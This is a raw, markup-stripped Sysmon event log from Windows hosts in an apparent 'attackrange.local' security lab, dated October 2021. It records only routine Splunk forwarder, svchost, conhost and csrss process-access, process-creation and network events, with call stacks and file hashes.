AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000081380Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:34.961{2FDD8D40-B24A-615A-4501-00000000FD01}23001032C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081379Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:34.774{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B24A-615A-4501-00000000FD01}2300C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081378Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:34.774{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081377Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:34.774{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081376Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:34.774{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081375Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:34.774{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081374Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:34.774{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081373Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:34.774{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081372Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:34.774{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081371Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:34.774{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081370Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:34.774{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081369Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:34.774{2FDD8D40-AC98-615A-0500-00000000FD01}412528C:\Windows\system32\csrss.exe{2FDD8D40-B24A-615A-4501-00000000FD01}2300C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081368Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:34.774{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B24A-615A-4501-00000000FD01}2300C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000081367Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:34.774{2FDD8D40-B24A-615A-4501-00000000FD01}2300C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000081366Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:34.758{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9548BF999EA3965C5AC55A824501E3A9,SHA256=CC94BA9B6B7606947B4E03DB653A1B3E5367151E938936B23997074736A70699,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103485Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:34.529{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=394F7FF20FEE5E7C6B291A352569D4FA,SHA256=573C5EDC1030645A80DC0B76B56F22AAF9EB7940BBEC8F05F3304FDFB36FBC1C,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081365Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:31.669{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50023-false10.0.1.12-8000- 23542300x800000000000000081364Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:34.180{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F9D8FC6F22B933492D8CE9C822BDED15,SHA256=149F73684244F6DA527F8D61DD9EB4FA7D6A603666A86CFE045439299E81F45E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081395Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:35.805{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B24B-615A-4601-00000000FD01}3128C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081394Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:35.805{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081393Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:35.805{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081392Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:35.805{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081391Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:35.805{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081390Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:35.805{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081389Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:35.805{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081388Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:35.805{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081387Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:35.805{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081386Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:35.805{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 